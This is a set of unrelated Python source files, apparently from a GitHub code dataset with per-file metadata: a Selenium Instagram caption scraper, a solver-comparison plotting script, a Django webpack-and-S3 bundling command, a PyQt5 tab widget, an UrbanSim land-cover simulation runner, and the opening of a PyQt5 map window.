    chrome_options.add_argument("--incognito")
    chrome_options.add_argument("start-maximized")
    chrome_options.add_argument("--no-sandbox")
    return WebDriver(options=chrome_options)
def openInstagram(url: str):
    """Open an Instagram post, extract its caption, strip hashtags,
    non-BMP characters (emoji) and a few special characters, then print
    and return the cleaned caption.

    Fixes: ``re`` was used below but never imported (NameError at
    runtime), and the browser process was never released.
    """
    import re  # missing from the module imports; re.sub below raised NameError

    # Create the Chrome window.
    driver = create_chrome()
    try:
        driver.implicitly_wait(10)
        # Navigate to the Instagram post URL.
        driver.get(url)
        # Extract the caption text of the post.
        text = driver.find_elements(By.XPATH, "//*[@class='_a9zr']")[0].text
        # Collect hashtags.
        tags = [i for i in text.split() if i.startswith("#")]
        # Record where each tag starts so it can be skipped later.
        indexList = []
        for tag in tags:
            indexList.append(text.index(tag))
        # Unicode Basic Multilingual Plane; anything outside is treated
        # as an emoji/symbol and dropped.
        SUPPORTED_RANGE_START = 0x0000
        SUPPORTED_RANGE_END = 0xFFFF
        # Pattern of special characters to remove.
        special_chars = r"[!@#$%^&*()]"
        text = re.sub(special_chars, "", text)
        # Rebuild the text, skipping tags (by recorded position) and
        # characters outside the BMP.
        i = 0
        rst = ""
        while i < len(text):
            try:
                s = text[i]
                # Skip over a tag whenever the cursor sits on one.
                for index in indexList:
                    if i == index:
                        tag = tags[indexList.index(index)]
                        i += len(tag)
                if s != "#":
                    code_point = ord(s)
                    if SUPPORTED_RANGE_START <= code_point <= SUPPORTED_RANGE_END:
                        rst += s
                i += 1
            except Exception:
                # NOTE(review): kept from the original (as a bare except)
                # to survive index drift after re.sub shifts positions;
                # narrowed to Exception.
                i += 1
        print(rst)
        return rst
    finally:
        driver.quit()  # always release the browser process
# url format -> https://www.instagram.com/p/~
# Example invocation: scrape and print the cleaned caption of one post.
openInstagram("https://www.instagram.com/p/Ct8JehTPpNe/")
| Yuminyumin/MBTIGRAM | cr.py | cr.py | py | 2,254 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "chromedriver_autoinstaller.install",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.chrome.options.Options",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.chrome.webdriver.WebDriver",
"line_number": 1... |
28877476369 | #!/usr/bin python3
import numpy as np
import pathlib
import pickle
import os
from DGSQP.tracks.track_lib import get_track
import matplotlib.pyplot as plt
import matplotlib
matplotlib.use('TkAgg')
plt.rcParams['text.usetex'] = True
# Monte-Carlo comparison post-processing: load every pickled result in
# the run directory and tally convergence statistics for the two
# solvers ("dgsqp"/SQP vs "algames"/ALG).
data_dir = 'dgsqp_algames_mc_comp_09-10-2022_19-41-37'
data_path = pathlib.Path(pathlib.Path.home(), f'results/{data_dir}')
# Constraint-violation magnitudes, bucketed by outcome (converged /
# hit max iterations / failed), plus counters for zero-violation cases.
sqp_conv_feas, sqp_max_feas, sqp_fail_feas = [], [], []
alg_conv_feas, alg_max_feas, alg_fail_feas = [], [], []
n_sqp_conv_feas = 0
n_sqp_fail_feas = 0
n_alg_conv_feas = 0
n_alg_fail_feas = 0
# k: number of samples processed; a: running sum of relative iteration
# differences between the two solvers.
k = 0
a = 0
# Outcome counters, iteration counts and solve times per solver.
sqp_n_conv, sqp_n_div, sqp_n_max = 0, 0, 0
sqp_iters, sqp_time = [], []
alg_n_conv, alg_n_div, alg_n_max = 0, 0, 0
alg_iters, alg_time = [], []
# Mean initial position of the joint state, used for the scatter plots.
x0, y0 = [], []
sqp_status, alg_status = [], []
# NOTE(review): the loop variable `f` is rebound by the `with` target
# below (filename -> file object); harmless here but worth renaming.
for f in os.listdir(data_path):
    if f.endswith('.pkl'):
        with open(data_path.joinpath(f), 'rb') as f:
            data = pickle.load(f)
        joint_init = data['dgsqp']['init']
        x0.append(np.mean([s.x.x for s in joint_init]))
        y0.append(np.mean([s.x.y for s in joint_init]))
        sqp_res, alg_res = data['dgsqp'], data['algames']
        # --- SQP solver bookkeeping ---
        sqp_conv = sqp_res['solve_info']['status']
        sqp_msg = sqp_res['solve_info']['msg']
        sqp_vio = sqp_res['solve_info']['cond']['p_feas']
        if sqp_conv:
            sqp_n_conv += 1
            sqp_iters.append(sqp_res['solve_info']['num_iters'])
            sqp_time.append(sqp_res['solve_info']['time'])
            if sqp_vio > 0:
                sqp_conv_feas.append(sqp_vio)
            else:
                n_sqp_conv_feas += 1
        if sqp_msg == 'max_it':
            sqp_n_max += 1
            if sqp_vio > 0:
                sqp_max_feas.append(sqp_vio)
            else:
                n_sqp_fail_feas += 1
        elif sqp_msg == 'diverged' or sqp_msg == 'qp_fail':
            sqp_n_div += 1
            if sqp_vio > 0:
                sqp_fail_feas.append(sqp_vio)
            else:
                n_sqp_fail_feas += 1
        sqp_status.append(sqp_conv)
        # --- ALGAMES solver bookkeeping (mirrors the SQP branch) ---
        alg_conv = alg_res['solve_info']['status']
        alg_msg = alg_res['solve_info']['msg']
        alg_vio = np.abs(alg_res['solve_info']['cond']['p_feas'])
        if alg_conv:
            alg_n_conv += 1
            alg_iters.append(alg_res['solve_info']['num_iters'])
            alg_time.append(alg_res['solve_info']['time'])
            if alg_vio > 0:
                alg_conv_feas.append(alg_vio)
            else:
                n_alg_conv_feas += 1
        if alg_msg == 'max_iters' or alg_msg == 'max_it':
            alg_n_max += 1
            if alg_vio > 0:
                alg_max_feas.append(alg_vio)
            else:
                n_alg_fail_feas += 1
        elif alg_msg == 'diverged':
            alg_n_div += 1
            if alg_vio > 0:
                alg_fail_feas.append(alg_vio)
            else:
                n_alg_fail_feas += 1
        alg_status.append(alg_conv)
        # Running relative difference of mean iteration counts.
        a += (np.mean(sqp_iters)-np.mean(alg_iters))/np.mean(alg_iters)
        k += 1
# print(n_sqp_conv_feas, n_sqp_fail_feas)
# print(n_alg_conv_feas, n_alg_fail_feas)
# print(a/k)
x0 = np.array(x0)
y0 = np.array(y0)
w = 7
print('========================================')
print(' | SQP | ALG ')
print('Converged |%s|%s' % (f'{sqp_n_conv:3d}'.rjust(w), f'{alg_n_conv:3d}'.rjust(w)))
print('Failed |%s|%s' % (f'{sqp_n_div:3d}'.rjust(w), f'{alg_n_div:3d}'.rjust(w)))
print('Max |%s|%s' % (f'{sqp_n_max:3d}'.rjust(w), f'{alg_n_max:3d}'.rjust(w)))
print('Avg iters |%s|%s' % (f'{np.mean(sqp_iters):4.2f}'.rjust(w), f'{np.mean(alg_iters):4.2f}'.rjust(w)))
print('Std iters |%s|%s' % (f'{np.std(sqp_iters):4.2f}'.rjust(w), f'{np.std(alg_iters):4.2f}'.rjust(w)))
print('Avg time |%s|%s' % (f'{np.mean(sqp_time):4.2f}'.rjust(w), f'{np.mean(alg_time):4.2f}'.rjust(w)))
print('Std time |%s|%s' % (f'{np.std(sqp_time):4.2f}'.rjust(w), f'{np.std(alg_time):4.2f}'.rjust(w)))
track_obj = get_track('L_track_barc')
fig = plt.figure(figsize=(20,10))
ax_sqp = fig.add_subplot(1,2,1)
track_obj.plot_map(ax_sqp)
sqp_succ = np.where(sqp_status)[0].astype(int)
sqp_fail = np.setdiff1d(np.arange(len(sqp_status)), sqp_succ).astype(int)
ax_sqp.scatter(x0[sqp_succ], y0[sqp_succ], facecolors='none', edgecolors='g', marker='o', s=40)
ax_sqp.scatter(x0[sqp_fail], y0[sqp_fail], c='r', marker='x', s=40)
ax_sqp.set_aspect('equal')
ax_sqp.get_xaxis().set_ticks([])
ax_sqp.get_yaxis().set_ticks([])
# ax_sqp.tick_params(axis='x', labelsize=15)
# ax_sqp.tick_params(axis='y', labelsize=15)
ax_alg = fig.add_subplot(1,2,2)
track_obj.plot_map(ax_alg)
alg_succ = np.where(alg_status)[0].astype(int)
alg_fail = np.setdiff1d(np.arange(len(alg_status)), alg_succ).astype(int)
ax_alg.scatter(x0[alg_succ], y0[alg_succ], facecolors='none', edgecolors='g', marker='o', s=40)
ax_alg.scatter(x0[alg_fail], y0[alg_fail], c='r', marker='x', s=40)
ax_alg.set_aspect('equal')
ax_alg.get_xaxis().set_ticks([])
ax_alg.get_yaxis().set_ticks([])
# ax_alg.tick_params(axis='x', labelsize=15)
fig.subplots_adjust(wspace=0.01)
plt.show()
| zhu-edward/DGSQP | scripts/process_data_comp.py | process_data_comp.py | py | 5,070 | python | en | code | 9 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "path... |
36568229403 | from django.core.management.base import BaseCommand
import json
import subprocess
try:
from boto.s3.connection import S3Connection
from boto.s3.key import Key
except:
pass
from django.conf import settings
import mimetypes
import os
def call_subprocess(command):
    """Run *command* in a shell and wait for it to complete.

    Fix: the original spawned the process with piped stdout and returned
    immediately, never reading the pipe or reaping the child — large output
    could deadlock and the child lingered as a zombie.

    Returns the child's exit code.
    """
    proc = subprocess.Popen(command,
                            shell=True,  # command is a fixed internal string, not user input
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            )
    # Drain stdout/stdin and wait so the child is reaped deterministically.
    proc.communicate()
    return proc.returncode
def upload_to_s3(css_file):
    """Upload one built webpack asset to the configured S3 bucket.

    The object key is ``webpack_bundles/<basename>`` and the object is made
    publicly readable. Fixes over the original: the source file is closed via
    a context manager, and the bucket is fetched once instead of twice.
    """
    bucket_name = settings.AWS_BUCKET_NAME
    conn = S3Connection(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_ACCESS_KEY)
    folder = 'webpack_bundles/'
    bucket = conn.get_bucket(bucket_name=bucket_name)
    filename = css_file.split('/')[-1]
    with open(css_file, 'r') as file_obj:
        content = file_obj.read()
    key = folder + filename
    # Guess the Content-Type from the extension so browsers interpret the asset.
    mime = mimetypes.guess_type(filename)[0]
    k = Key(bucket)
    k.key = key  # folder + filename
    k.set_metadata("Content-Type", mime)
    k.set_contents_from_string(content)
    # Bundles are served directly from the bucket, so they must be public.
    k.set_acl("public-read")
class Command(BaseCommand):
    """Management command: run webpack, optionally push bundles to S3, and
    rewrite the template tags to point at the freshly built files."""
    args = '<filename>'
    help = 'Loads the initial data in to database'

    def handle(self, *args, **options):
        """Build bundles and update each configured template in place."""
        call_subprocess('./node_modules/.bin/webpack --config webpack.config.js')
        for each in settings.WEB_PACK_FILES:
            directory = settings.BASE_DIR + '/static/webpack_bundles/'
            # Newest emitted CSS/JS whose name starts with the configured bundle name.
            css_file = max([os.path.join(directory, d) for d in os.listdir(directory) if d.startswith(each['webpack_js']) and d.endswith('css')], key=os.path.getmtime)
            js_file = max([os.path.join(directory, d) for d in os.listdir(directory) if d.startswith(each['webpack_js']) and d.endswith('js')], key=os.path.getmtime)
            if settings.ENABLE_DJANGO_WEBPACK_S3_STORAGES:
                upload_to_s3(css_file)
                upload_to_s3(js_file)
            import re
            # Capture groups bracket the stylesheet href and the script src so only
            # the URLs are replaced; the template must contain the id="packer_css"
            # and id="packer_js" marker attributes for the match to succeed.
            regex = r'(.*?<link rel="stylesheet" type="text/css" href=")(.*?)(" id="packer_css"/>.*?<script id="packer_js" src=")(.*?)(" type="text/javascript"></script>.*)'
            with open(each['html_file_name'], 'r+') as f:
                content = f.read()
                m = re.match(regex, content, re.DOTALL)
                href = settings.STATIC_URL + css_file.split('/static/')[-1]
                src = settings.STATIC_URL + js_file.split('/static/')[-1]
                content = m.group(1) + href + m.group(3) + src + m.group(5)
            # Rewrite the whole template with the updated asset URLs.
            with open(each['html_file_name'], 'w') as f:
                f.write(content)
        result = {'message': "Successfully Created Compressed CSS, JS Files"}
        return json.dumps(result)
| MicroPyramid/django-webpacker | django_webpacker/management/commands/compress_css_js_files.py | compress_css_js_files.py | py | 2,758 | python | en | code | 72 | github-code | 36 | [
{
"api_name": "subprocess.Popen",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "subprocess.PIPE",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "subprocess.PIPE",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "django.con... |
41633074479 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Custom TabBar and TabWidget.
Tabs like ChromeOS for Python3 Qt5 with Extras like UnDock / ReDock Tabs,
Pin / UnPin Tabs, On Mouse Hover Previews for all Tabs except current Tab,
Colored Tabs, Change Position, Change Shape, Fading Transition effect,
Close all Tabs to the Right, Close all Tabs to the Left, Close all other Tabs,
Mouse Hover Tracking, Add Tab Plus Button, Limit Maximum of Tabs, and more.
"""
from PyQt5.QtCore import QEvent, QTimeLine, QTimer
from PyQt5.QtGui import QBrush, QColor, QCursor, QPainter, QRadialGradient
from PyQt5.QtWidgets import (QColorDialog, QDialog, QInputDialog, QLabel,
QMainWindow, QMenu, QMessageBox, QTabBar,
QTabWidget, QToolButton, QVBoxLayout)
##############################################################################
class FaderWidget(QLabel):
    """Overlay label that fades out a snapshot of the previous tab page."""

    def __init__(self, parent):
        """Create the timeline that drives the fade-out animation."""
        super(FaderWidget, self).__init__(parent)
        self.timeline = QTimeLine()
        self.opacity = 1.0
        self.old_pic = None
        self.timeline.valueChanged.connect(self.animate)
        self.timeline.finished.connect(self.close)
        # 500-750 ms reads as a smooth transition; longer feels sluggish.
        self.timeline.setDuration(750)

    def paintEvent(self, event):
        """Draw the stored snapshot at the current fade opacity."""
        painter = QPainter(self)
        painter.setOpacity(self.opacity)
        if self.old_pic:
            painter.drawPixmap(0, 0, self.old_pic)

    def animate(self, value):
        """Timeline callback: reduce opacity, hiding once nearly transparent."""
        self.opacity = 1.0 - value
        if self.opacity < 0.1:
            return self.hide()
        return self.repaint()

    def fade(self, old_pic, old_geometry, move_to):
        """Begin fading *old_pic* out over the area given by *old_geometry*."""
        if self.isVisible():
            self.close()
        if self.timeline.state():
            self.timeline.stop()
        self.setGeometry(old_geometry)
        self.move(1, move_to)
        self.old_pic = old_pic
        self.timeline.start()
        self.show()
class TabBar(QTabBar):
    """Custom tab bar with a rich per-tab context menu.

    Fixes over the original:
    * ``tabCloseRequested`` now removes the tab whose close button was pressed
      (the signal's index argument) rather than whichever tab was current.
    * ``set_color`` checks ``color.isValid()`` — ``QColorDialog.getColor``
      returns an *invalid* but still truthy ``QColor`` when the dialog is
      cancelled, so the old ``if color:`` guard always applied it.
    """
    def __init__(self, parent=None, *args, **kwargs):
        """Init class custom tab bar."""
        super(TabBar, self).__init__(parent=None, *args, **kwargs)
        # NOTE: ``self.parent`` intentionally mirrors the original attribute
        # (it shadows QWidget.parent()); kept for caller compatibility.
        self.parent, self.limit = parent, self.count() * 2
        self.menu, self.submenu = QMenu("Tab Options"), QMenu("Tabs")
        self.tab_previews = True
        self.menu.addAction("Tab Menu").setDisabled(True)
        self.menu.addSeparator()
        self.menu.addAction("Set Tab Text", self.set_text)
        self.menu.addAction("Set Tab Color", self.set_color)
        self.menu.addAction("Set Limits", self.set_limit)
        self.menu.addSeparator()
        self.menu.addAction("Change Tab Shape", self.set_shape)
        self.menu.addAction("Top or Bottom Position", self.set_position)
        self.menu.addAction("Pin or Unpin Tab", self.set_pinned)
        self.menu.addAction("Undock Tab", self.make_undock)
        self.menu.addAction("Toggle Tabs Previews", self.set_tab_previews)
        self.menu.addSeparator()
        self.menu.addAction("Close this Tab",
                            lambda: self.removeTab(self.currentIndex()))
        self.menu.addAction("Close all Tabs to the Right",
                            self.close_all_tabs_to_the_right)
        self.menu.addAction("Close all Tabs to the Left",
                            self.close_all_tabs_to_the_left)
        self.menu.addAction("Close all other Tabs", self.close_all_other_tabs)
        self.menu.addSeparator()
        self.menu.addMenu(self.submenu)
        self.menu.aboutToShow.connect(self.build_submenu)
        # Close the tab that emitted the request; the signal carries its index.
        self.tabCloseRequested.connect(self.removeTab)
        self.setMouseTracking(True)
        self.installEventFilter(self)

    def eventFilter(self, obj, event):
        """Custom event filter: hovering a tab makes it the current tab."""
        if obj == self:
            if event.type() == QEvent.MouseMove:
                index = self.tabAt(event.pos())
                self.setCurrentIndex(index)
                return True
            else:
                return QTabBar.eventFilter(self, obj, event)  # False
        else:
            return QMainWindow.eventFilter(self, obj, event)

    def mouseDoubleClickEvent(self, event):
        """Handle double click: open the context menu at the cursor."""
        self.menu.exec_(QCursor.pos())

    def set_tab_previews(self):
        """Toggle On/Off the Tabs Previews."""
        self.tab_previews = not self.tab_previews
        return self.tab_previews

    def close_all_tabs_to_the_right(self):
        """Close all tabs to the Right."""
        for i in range(self.currentIndex() + 1, self.count()):
            if self.count() > 2:
                self.removeTab(self.count() - 1)

    def close_all_tabs_to_the_left(self):
        """Close all tabs to the Left."""
        for i in range(self.currentIndex()):
            if self.count() > 2:
                self.removeTab(0)

    def close_all_other_tabs(self):
        """Close all other tabs."""
        self.close_all_tabs_to_the_right()
        self.close_all_tabs_to_the_left()

    def make_undock(self):
        """Undock Tab from TabWidget to a Dialog, if theres more than 2 Tabs."""
        msg = "<b>Needs more than 2 Tabs to allow Un-Dock Tabs !."
        return self.parent.make_undock() if self.count(
        ) > 2 else QMessageBox.warning(self, "Error", msg)

    def set_shape(self):
        """Handle set Shape on Tabs."""
        self.parent.setTabShape(0 if self.parent.tabShape() else 1)

    def set_position(self):
        """Handle set Position on Tabs."""
        self.parent.setTabPosition(0 if self.parent.tabPosition() else 1)

    def set_text(self):
        """Handle set Text on Tabs (capped at 50 characters)."""
        text = str(QInputDialog.getText(
            self, "Tab Options Dialog", "<b>Type Tab Text:",
            text=self.tabText(self.currentIndex()))[0]).strip()[:50]
        if text:
            self.setTabText(self.currentIndex(), text)

    def set_color(self):
        """Handle set Colors on Tabs; ignores a cancelled dialog."""
        color = QColorDialog.getColor()
        if color.isValid():
            self.setTabTextColor(self.currentIndex(), color)

    def set_pinned(self):
        """Handle Pin and Unpin Tabs (pinned tabs hide text + close button)."""
        index = self.currentIndex()
        if self.tabText(index) == "":
            self.setTabText(index, self.tabToolTip(index))
            self.tabButton(index, 1).show()
        else:
            self.setTabToolTip(index, self.tabText(index))
            self.setTabText(index, "")
            self.tabButton(index, 1).hide()

    def build_submenu(self):
        """Handle build a sub-menu on the fly with the list of tabs."""
        self.submenu.clear()
        self.submenu.addAction("Tab list").setDisabled(True)
        for index in tuple(range(self.count())):
            action = self.submenu.addAction("Tab {0}".format(index + 1))
            # Bind the loop variable as a default to avoid late-binding closures.
            action.triggered.connect(
                lambda _, index=index: self.setCurrentIndex(index))

    def set_limit(self):
        """Limit the Maximum number of Tabs that can coexist, TBD by Dev."""
        limit = int(QInputDialog.getInt(
            self, "Tab Options Dialog", "<b>How many Tabs is the Maximum ?:",
            self.count() * 2, self.count() * 2, 99)[0])
        if limit:
            self.limit = limit
        return limit
class TabWidget(QTabWidget):
    """Custom tab widget."""
    def __init__(self, parent=None, *args, **kwargs):
        """Init class custom tab widget."""
        super(TabWidget, self).__init__(parent=None, *args, **kwargs)
        # Preview popups plus a single-shot timer that closes any open ones.
        self.parent, self.previews, self.timer = parent, [], QTimer(self)
        self.fader, self.previous_pic = FaderWidget(self), None
        self.timer.setSingleShot(True)
        self.timer.timeout.connect(lambda: [_.close() for _ in self.previews])
        self.setTabBar(TabBar(self))
        self.setMovable(False)
        self.setTabsClosable(True)
        self.setTabShape(QTabWidget.Triangular)
        # Corner buttons: "+" add-tab (right corner) and "?" menu (left corner).
        self.addtab, self.menu_0 = QToolButton(self), QToolButton(self)
        self.addtab.setText(" + ")
        self.addtab.setToolTip("<b>Add Tabs")
        self.menu_0.setText(" ? ")
        self.menu_0.setToolTip("<b>Menu")
        font = self.addtab.font()
        font.setBold(True)
        self.addtab.setFont(font)
        self.menu_0.setFont(font)
        # NOTE(review): the corner buttons are not wired to any slot — the
        # intended handlers remain commented out below; confirm before release.
        # self.addtab.clicked.connect(self.addTab)
        # self.menu_0.clicked.connect(self.show_menu)
        self.setCornerWidget(self.addtab, 1)
        self.setCornerWidget(self.menu_0, 0)
##############################################################################
if __name__ == '__main__':
    # Manual smoke test: a TabWidget alternating label and calendar pages.
    # Fix: the original used ``__name__ in '__main__'`` — a substring test
    # that happens to work but is not an equality comparison.
    from PyQt5.QtWidgets import QApplication, QCalendarWidget
    app = QApplication([])
    gui = TabWidget()
    for i in range(9):
        gui.addTab(QLabel("<center><h1 style='color:red'>Tab {0} !".format(i))
                   if i % 2 else QCalendarWidget(), " Tab {0} ! ".format(i))
    gui.show()
    exit(app.exec_())
{
"api_name": "PyQt5.QtWidgets.QLabel",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtCore.QTimeLine",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtGui.QPainter",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "Py... |
28508502447 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
import gc
import os
import sys
import shutil
import tempfile
from numpy import arange
from opus_core.variables.attribute_type import AttributeType
from opus_core.store.attribute_cache import AttributeCache
from opus_core.coefficients import Coefficients
from opus_core.storage_factory import StorageFactory
from opus_core.opus_package import OpusPackage
from opus_core.store.attribute_cache import AttributeCache
from opus_core.simulation_state import SimulationState
from opus_core.logger import logger
from opus_core.session_configuration import SessionConfiguration
from urbansim.datasets.gridcell_dataset import GridcellDataset
from biocomplexity.datasets.land_cover_dataset import LandCoverDataset
from biocomplexity.models.land_cover_change_model import LandCoverChangeModel
from biocomplexity.equation_specification import EquationSpecification
from biocomplexity.opus_package_info import package
from biocomplexity.constants import Constants
from biocomplexity.examples.lccm_runner_sample import LccmConfiguration
from biocomplexity.tools.lc_convert_to_flt2 import ConvertToFloat
from biocomplexity.tools.lc_convert2 import LCCMInputConvert
from opus_core.chunk_specification import ChunkSpecification
class Simulation(object):
    """ Import data from urbansim cache directory, and compute the following
        computed variables: devt, de, commden, house_den, comm_add and house_add.

    Fix: the two live ``assert(status == 0, "msg")`` statements asserted a
    non-empty tuple, which is always truthy, so a failed conversion could
    never trip the assertion. They now assert the condition itself.
    """
    package_path = OpusPackage().get_path_for_package("biocomplexity")
    #lct_attribute = "biocomplexity.land_cover.lct_recoded"
    lct_attribute = "lct"
    possible_lcts = range(1,15)

    def _clean_up_land_cover_cache(self, path):
        """Delete a cached land-cover directory if present."""
        if os.path.exists(path):
            shutil.rmtree(path)

    def _get_previous_year(self, current_year, years):
        """Return the year preceding *current_year* in *years*."""
        current_year_index = -1
        for i in range(len(years)):
            if current_year == years[i]:
                current_year_index = i
                # Warn when the matched year has no predecessor in the list.
                if i <= 0 or i >= len(years):
                    logger.log_error("invalid year " + str(current_year))
        return years[current_year_index-1]

    def _generate_input_land_cover(self, current_year, base_directory,
                                   urbansim_cache_directory, years, output_directory,
                                   convert_flt, convert_input):
        """Prepare (and possibly convert) the land-cover input directory for a year."""
        if current_year == years[0]:
            if not convert_input:
                return base_directory
            else:
                package_dir_path = package().get_package_path()
                command = os.path.join(package_dir_path, "tools", "lc_convert.py")
                status = os.system(command + ' %s -i "%s" -o "%s"' % ('input data', base_directory, self.temp_land_cover_dir))
                assert status == 0, "generate input failed"
                return self.temp_land_cover_dir
        previous_year = self._get_previous_year(current_year, years)
        if not convert_flt:
            logger.start_block("Copy data from %s to temp land cover folder" % urbansim_cache_directory)
            try:
                self._copy_invariants_to_temp_land_cover_dir(os.path.join(urbansim_cache_directory, str(previous_year)))
            finally:
                logger.end_block()
            return self.temp_land_cover_dir
        flt_directory_in = os.path.join(output_directory, str(previous_year))
        flt_directory_out = self.temp_land_cover_dir
        LCCMInputConvert()._convert_lccm_input(flt_directory_in, flt_directory_out)
        return self.temp_land_cover_dir

    def _get_max_index(self, land_cover_path):
        """Return the number of land-cover cells stored at *land_cover_path*."""
        land_covers = LandCoverDataset(in_storage=StorageFactory().get_storage("flt_storage", storage_location=land_cover_path))
        return land_covers.size()

    def _copy_invariants_to_temp_land_cover_dir(self, land_cover_path):
        """Copy primary land-cover attributes into the temp working directory."""
        logger.log_status("temp input land cover data in " + self.temp_land_cover_dir)
        land_covers = LandCoverDataset(in_storage=StorageFactory().get_storage("flt_storage", storage_location=land_cover_path),
                                       out_storage=StorageFactory().get_storage("flt_storage", storage_location=self.temp_land_cover_dir),
                                       out_table_name='land_covers', debuglevel=4)
        logger.log_status("Land cover dataset created.... ")
        land_covers.flush_dataset()
        land_covers.write_dataset(attributes=AttributeType.PRIMARY)

    def _generate_output_flt(self, current_year, urbansim_cache_directory,
                             output_directory, convert_flt):
        """Convert a year's cache to .flt via the external converter script."""
        if not convert_flt:
            return
        package_dir_path = package().get_package_path()
        command = os.path.join(package_dir_path, "tools", "lc_convert_to_flt.py")
        flt_directory_in = os.path.join(urbansim_cache_directory, str(current_year))
        flt_directory_out = os.path.join(output_directory, str(current_year))
        status = os.system(sys.executable + ' ' + command + ' %d -i "%s" -o "%s"' % (current_year, flt_directory_in, flt_directory_out))
        assert status == 0, "generate output failed"

    def _generate_output_flt2(self, current_year, urbansim_cache_directory,
                              output_directory, convert_flt):
        """Convert a year's cache to .flt in-process (preferred over _generate_output_flt)."""
        if not convert_flt:
            return
        flt_directory_in = os.path.join(urbansim_cache_directory, str(current_year))
        flt_directory_out = os.path.join(output_directory, str(current_year))
        ConvertToFloat()._create_flt_file(current_year, flt_directory_in, flt_directory_out)

    def run(self, base_directory, urbansim_cache_directory, years, output_directory, temp_folder,
            coefficients_name, specification_name, convert_flt=True, convert_input=False):
        """ run the simulation
            base_directory: directory contains all years folder of lccm.
            urbansim_cache_directory: directory contains all years folder of urbansim cache.
            years: lists of year to run."""
        model = LandCoverChangeModel(self.possible_lcts, submodel_string=self.lct_attribute,
                                     choice_attribute_name=self.lct_attribute, debuglevel=4)
        coefficients = Coefficients()
        storage = StorageFactory().get_storage('tab_storage',
                                               storage_location=os.path.join(self.package_path, 'data'))
        coefficients.load(in_storage=storage, in_table_name=coefficients_name)
        specification = EquationSpecification(in_storage=storage)
        specification.load(in_table_name=specification_name)
        specification.set_variable_prefix("biocomplexity.land_cover.")
        constants = Constants()
        simulation_state = SimulationState()
        simulation_state.set_cache_directory(urbansim_cache_directory)
        attribute_cache = AttributeCache()
        SessionConfiguration(new_instance=True,
                             package_order=['biocomplexity', 'urbansim', 'opus_core'],
                             in_storage=AttributeCache())
        ncols = LccmConfiguration.ncols
        if temp_folder is None:
            self.temp_land_cover_dir = tempfile.mkdtemp()
        else:
            self.temp_land_cover_dir = temp_folder
        for year in years:
            land_cover_path = self._generate_input_land_cover(year, base_directory, urbansim_cache_directory,
                                                              years, output_directory, convert_flt, convert_input)
            max_size = self._get_max_index(land_cover_path)
            offset = min(LccmConfiguration.offset, max_size)
            s = 0
            t = offset
            # Process the land-cover grid in overlapping [s, t) windows.
            while (s < t and t <= max_size):
                logger.log_status("Offset: ", s, t)
                index = arange(s, t)
                land_cover_cache_path = os.path.join(urbansim_cache_directory, str(year), 'land_covers')
                self._clean_up_land_cover_cache(land_cover_cache_path)
                simulation_state.set_current_time(year)
                land_covers = LandCoverDataset(in_storage=StorageFactory().get_storage('flt_storage', storage_location=land_cover_path),
                                               out_storage=StorageFactory().get_storage('flt_storage', storage_location=land_cover_path),
                                               debuglevel=4)
                land_covers.subset_by_index(index)
                gridcells = GridcellDataset(in_storage=attribute_cache, debuglevel=4)
                model.run(specification, coefficients, land_covers, data_objects={"gridcell": gridcells,
                          "constants": constants, "flush_variables": True},
                          chunk_specification={'nchunks': 5})  # chunk size set here
                land_covers.flush_dataset()
                # Drop the per-window datasets before the next allocation.
                del gridcells
                del land_covers
                self._generate_output_flt2(year, urbansim_cache_directory, output_directory, convert_flt)
                if t >= max_size: break
                # Overlap windows by 10 rows (10*ncols cells) to avoid edge effects.
                s = max(t - 10*ncols, s)
                t = min(t + offset - 10*ncols, max_size)
        # clean up temp storage after done simulation
        shutil.rmtree(self.temp_land_cover_dir)
if __name__ == "__main__":
    # NOTE(review): Simulation.run() requires base_directory, cache directory,
    # years, output_directory, temp_folder, coefficients_name and
    # specification_name; this call passes only three positional arguments and
    # would raise a TypeError — confirm intended usage before running directly.
    base_dir = r"O:\unix\projects\urbansim9\land_cover_change_model\LCCM_4County_converted/1995"
    urbansim_cache = r"D:\urbansim_cache\2006_02_10__13_06"
    Simulation().run(base_dir, urbansim_cache, [2005])
| psrc/urbansim | biocomplexity/examples/run_simulation_all_chunks.py | run_simulation_all_chunks.py | py | 10,704 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "opus_core.opus_package.OpusPackage",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 47,
"usage_type": "attribute"
},
{
"api_name": "shutil... |
37018675284 |
from PyQt5 import uic
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtWidgets import QWidget
from PyQt5.QtWidgets import QLabel
from PyQt5.QtWidgets import QProgressBar
from PyQt5.QtWidgets import QFileDialog
from PyQt5.QtWidgets import QSizePolicy
from PyQt5.QtGui import *
from PyQt5.QtCore import Qt
from PyQt5.QtCore import pyqtSignal
import sys
import re
import numpy as np
import MO_Func as mof
class Appmap(QWidget):
    """Approach-curve map window: gathers x/y/z sweep parameters, launches the
    experiment and rename monitor threads, and reports progress in the GUI."""
    sig_log=pyqtSignal(list)
    # NOTE(review): class-level mutable lists, shared by all instances and
    # mutated in place via ``tlist[:] = res`` — confirm only one Appmap exists.
    xlist=[]
    ylist=[]
    zlist=[]
    replaced_list=[]
    def __init__(self,mainthread):
        # ``mainthread`` must expose LogWriter/MoveTo/ServoCheck/threadlist.
        super().__init__()
        self.mainthread=mainthread
        self.UILoader()
